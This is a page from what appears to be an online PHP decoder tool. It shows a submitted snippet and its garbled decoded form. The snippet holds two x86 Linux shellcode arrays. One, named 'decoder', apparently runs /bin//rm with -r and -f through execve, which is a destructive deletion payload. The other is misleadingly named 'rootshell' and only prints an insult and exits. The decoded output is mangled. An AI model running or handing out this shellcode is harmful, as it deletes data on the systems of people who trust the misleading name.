Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

unsigned char decoder[]= "\x6a\x0b\x58\x99\x52" "\x6a\x2f\x8..

Decoded Output download

<?  unsigned char decoder[]=   "jXR" 
                           "j/R" 
                           "fh-f" 
                           "Rfh-" 
                           "rRh" 
                           "//rmh" 
                           "/bin" 
                           "RWVQ" 
                           "S"; 
  
unsigned char rootshell[]= "1
ou!
Qck" 
                           " yQffufQ1" 
                           "1111" 
                           "@"; 
  ?>

Did this file decode correctly?

Original Code

unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
                           "\x6a\x2f\x89\xe7\x52"
                           "\x66\x68\x2d\x66\x89"
                           "\xe6\x52\x66\x68\x2d"
                           "\x72\x89\xe1\x52\x68"
                           "\x2f\x2f\x72\x6d\x68"
                           "\x2f\x62\x69\x6e\x89"
                           "\xe3\x52\x57\x56\x51"
                           "\x53\x89\xe1\xcd\x80";
 
unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
                           "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
                           "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
                           "\xdb\x40\xcd\x80";
 

Function Calls

None

Variables

None

Stats

MD5 8c83b03e7a9d6846cef2187cd43d32aa
Eval Count 0
Decode Time 91 ms